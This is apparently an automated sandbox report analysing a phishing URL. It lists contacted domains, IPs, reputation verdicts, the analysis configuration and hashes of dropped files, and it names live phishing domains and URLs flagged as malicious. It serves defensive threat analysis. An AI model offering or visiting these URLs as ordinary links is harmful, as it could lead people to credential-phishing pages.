        https://code.jquery.com/jquery-3.5.1.slim.min.js0%URL Reputationsafe
        https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%URL Reputationsafe
        https://cdn.jsdelivr.net/npm/bootstrap0%Avira URL Cloudsafe
        https://e9dj7.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkf0%Avira URL Cloudsafe
        https://career4vets.com/new/rocky.php0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#contact0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#about0%Avira URL Cloudsafe
        https://cdn.jsdelivr.net/npm/0%Avira URL Cloudsafe
        https://in-automate.brevo.com/cm?uuid=109bd09f-8162-4c15-979d-9737cee25901&client_id=8031197&trans=0&user_id=10%Avira URL Cloudsafe
        https://challenges.cloudflare.com/turnstile/v0/api.js0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK0%Avira URL Cloudsafe
        https://sibautomation.com/cm.html?id=8031197#trans=0&amp;user_id=10%Avira URL Cloudsafe
        https://bestcomps.com.ru/#0%Avira URL Cloudsafe
        https://sibautomation.com/cm.html?id=80311970%Avira URL Cloudsafe
        https://bestcomps.com.ru/#faq0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#classic-cars0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b62cdd32d9718b1/1724161320639/3888b8147d1e4e8d5dfb484f0c0e0a762cb1be53c184273959697968fd2372dd/mhw0YNMa9duS1Qm0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#electric-vehicles0%Avira URL Cloudsafe
        https://riseandgain.com/favicon.ico100%Avira URL Cloudphishing
        https://bestcomps.com.ru/#privacy0%Avira URL Cloudsafe
        https://willpeltz.com/favicon.ico0%Avira URL Cloudsafe
        https://bestcomps.com.ru//0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#terms0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c670%Avira URL Cloudsafe
        https://riseandgain.com/,100%Avira URL Cloudphishing
        https://bestcomps.com.ru/#learn-more0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b62cdd32d9718b1&lang=auto0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#services0%Avira URL Cloudsafe
        https://in-automate.brevo.com/cm?0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D0%Avira URL Cloudsafe
        https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js0%Avira URL Cloudsafe
        https://bestcomps.com.ru/#modern-supercars0%Avira URL Cloudsafe
        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        bestcomps.com.ru
        188.114.97.3
        truetrue
          unknown
          r1.mailin.fr
          1.179.112.195
          truefalse
            unknown
            career4vets.com
            162.241.87.113
            truefalse
              unknown
              d2t07dpvw9bt1v.cloudfront.net
              3.165.113.82
              truefalse
                unknown
                in-automate.brevo.com
                104.18.7.69
                truetrue
                  unknown
                  code.jquery.com
                  151.101.194.137
                  truefalse
                    unknown
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      unknown
                      riseandgain.com
                      162.241.87.113
                      truetrue
                        unknown
                        challenges.cloudflare.com
                        104.18.95.41
                        truefalse
                          unknown
                          www.google.com
                          216.58.212.164
                          truefalse
                            unknown
                            willpeltz.com
                            162.241.114.35
                            truefalse
                              unknown
                              sibautomation.com
                              104.18.25.243
                              truefalse
                                unknown
                                us-west-2.protection.sophos.com
                                unknown
                                unknownfalse
                                  unknown
                                  e9dj7.r.ag.d.sendibm3.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://e9dj7.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkffalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://career4vets.com/new/rocky.phpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/false
                                      unknown
                                      https://in-automate.brevo.com/cm?uuid=109bd09f-8162-4c15-979d-9737cee25901&client_id=8031197&trans=0&user_id=1true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmKfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://willpeltz.com/5069167943.phptrue
                                        unknown
                                        https://sibautomation.com/cm.html?id=8031197false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://willpeltz.com/true
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8b62cdd32d9718b1/1724161320639/3888b8147d1e4e8d5dfb484f0c0e0a762cb1be53c184273959697968fd2372dd/mhw0YNMa9duS1Qmfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://riseandgain.com/favicon.icotrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://riseandgain.com/true
                                            unknown
                                            https://sibautomation.com/cm.html?id=8031197#trans=0&user_id=1false
                                              unknown
                                              https://bestcomps.com.ru//true
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://willpeltz.com/favicon.icotrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67false
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://riseandgain.com/,true
                                              • Avira URL Cloud: phishing
                                              unknown
                                              https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqgtrue
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b62cdd32d9718b1&lang=autofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://cdn.jsdelivr.net/npm/chromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#aboutchromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cdn.jsdelivr.net/npm/bootstrapchromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://code.jquery.com/jquery-3.5.1.slim.min.jschromecache_75.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jschromecache_75.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://bestcomps.com.ru/#contactchromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sibautomation.com/cm.html?id=8031197#trans=0&amp;user_id=1chromecache_86.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#chromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#faqchromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#electric-vehicleschromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#classic-carschromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#privacychromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#termschromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#learn-morechromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#serviceschromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://in-automate.brevo.com/cm?chromecache_85.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bestcomps.com.ru/#modern-supercarschromecache_75.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                216.58.212.164
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                104.18.94.41
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                151.101.130.137
                                                unknownUnited States
                                                54113FASTLYUSfalse
                                                3.165.113.82
                                                d2t07dpvw9bt1v.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                151.101.194.137
                                                code.jquery.comUnited States
                                                54113FASTLYUSfalse
                                                1.179.112.195
                                                r1.mailin.frAustralia
                                                9723ISEEK-AS-APiseekCommunicationsPtyLtdAUfalse
                                                162.241.87.113
                                                career4vets.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                104.17.24.14
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.18.25.243
                                                sibautomation.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                104.18.7.69
                                                in-automate.brevo.comUnited States
                                                13335CLOUDFLARENETUStrue
                                                104.18.95.41
                                                challenges.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                188.114.97.3
                                                bestcomps.com.ruEuropean Union
                                                13335CLOUDFLARENETUStrue
                                                188.114.96.3
                                                unknownEuropean Union
                                                13335CLOUDFLARENETUSfalse
                                                162.241.114.35
                                                willpeltz.comUnited States
                                                46606UNIFIEDLAYER-AS-1USfalse
                                                104.17.25.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.17
                                                192.168.2.16
                                                192.168.2.4
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1495725
                                                Start date and time:2024-08-20 15:40:16 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 54s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.phis.win@21/36@34/19
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.217.23.99, 142.250.185.174, 64.233.184.84, 34.104.35.123, 142.250.74.195, 142.250.186.78
                                                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, settings-win.data.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg
                                                No simulations
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 20 12:40:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2673
                                                Entropy (8bit):3.9829704457203086
                                                Encrypted:false
                                                SSDEEP:48:8Pd3TvvWHNidAKZdA1FehwiZUklqehny+3:8pToUy
                                                MD5:9658007C370FD1DA260EF52A362FA7EB
                                                SHA1:3F267B5A19B90278589980A01FD19A9691AE2718
                                                SHA-256:59E76B4A77AB6130749B3A6C56F908104D37DF44ECD12DC5AE7761A1797E6469
                                                SHA-512:BDD9E025DCF471E5651B9A6144E8CFEADDB177EE3FECF0CC43406801ECABA0AA020C29B1E0975AB0495BB68343ED2A621D747387EF2713031B3A7F422F75E990
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,......Z.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 20 12:40:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):3.994323691161346
                                                Encrypted:false
                                                SSDEEP:48:8gd3TvvWHNidAKZdA1seh/iZUkAQkqehEy+2:8sTe9QVy
                                                MD5:BFC88ECC194C41AA4A95CEA1B776E443
                                                SHA1:020E5B9E566752EE96B044D28253F405C83BD679
                                                SHA-256:D3338BBC11736D6C3358C514C53911AEEB3543A460C215AC11CB826E18BBF70F
                                                SHA-512:AF717718FEA8C9B67447A02142C9AB5FF0DD622F9FDA3E03282A93F4503390919A7C2EA124A149A6730A69CF7EA2C66421057C1342783861AB688249EF3E47A4
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....uaO.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.005630133822108
                                                Encrypted:false
                                                SSDEEP:48:8rd3TvvAHNidAKZdA14meh7sFiZUkmgqeh7sqy+BX:8FTAnwy
                                                MD5:DF241307048CAA6F0CA3986F04038290
                                                SHA1:A7DCD49F5A3C8FAFEDEC278C4E1B4BEC6E7F8BD1
                                                SHA-256:A4F0CAF79454791E19845ED01D5A8F49CA51BB2A8B8F6655CE659829CD138B6D
                                                SHA-512:FE226212C68E2656C0D77AEE377AC4D34C047191AF6F1FD7943C1B598D9AACE98FCAED7440553C30EAEFD608BAF3D589190CDB4841FBD31E58A5F31DB8B745A0
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 20 12:40:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.997114628556834
                                                Encrypted:false
                                                SSDEEP:48:8vd3TvvWHNidAKZdA1TehDiZUkwqehIy+R:8JTViy
                                                MD5:1815432D4CF12658545AA5CC9C946226
                                                SHA1:FFEEEC9B6D7A84D9F7CBA915673118E0AC41FBA1
                                                SHA-256:747D5E75BA35ADBB62B47B6FCC88AE0B5D71F2B31E3C77DCE2229129CD9435C4
                                                SHA-512:6A291657172AE34CF6513FDB9726B33015B9D787A7C5D945837F65F9003E482E8B3AECD8F6D5224A1EF7FDA5DF85ADF4FC5638334EE4B82CCF9337999A88CCF6
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,......I.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 20 12:40:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9850523358893444
                                                Encrypted:false
                                                SSDEEP:48:8Rd3TvvWHNidAKZdA1dehBiZUk1W1qehGy+C:87Tl9my
                                                MD5:3A6C50BB3FE74323E66363EE6AF39DDB
                                                SHA1:F0044182C0CAB3FBEB14D83D8F52885E11302C74
                                                SHA-256:3533E7D79C92C3A641767D34B891330807FE94F4D1334AB272C152AEDCAD2C34
                                                SHA-512:27DDF2FEFA9A7C0AF2FA82EDE722B825C5EB844AFE5A660100CDF6876094AC5AC32CC9A03604CE71844796CD012862216A92CEC5021C88CD1F00161080F4CE84
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....TU.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 20 12:40:49 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.9918363339802108
                                                Encrypted:false
                                                SSDEEP:48:8/d3TvvWHNidAKZdA1duTeehOuTbbiZUk5OjqehOuTbwy+yT+:85TNTfTbxWOvTbwy7T
                                                MD5:6413CB04DA59E96E6EC7AD1521D59082
                                                SHA1:C1041EE7C77DAAA8437491DA2EE66ABE9D33DEBA
                                                SHA-256:14E8754E7765D33190F51DBFB6A3039E68F07726CC132870A74CBFC11659172E
                                                SHA-512:B95793FE275D79AB12E0507E00E7C7674745CB9B6F109393ABBD82B2F18EF917C64B70B898E7C44615BB0142C77945862C5863471AEFC1548610FD245255BCD3
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....JF@.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.m....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.m....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.m....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.m..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.m...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............Wd.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
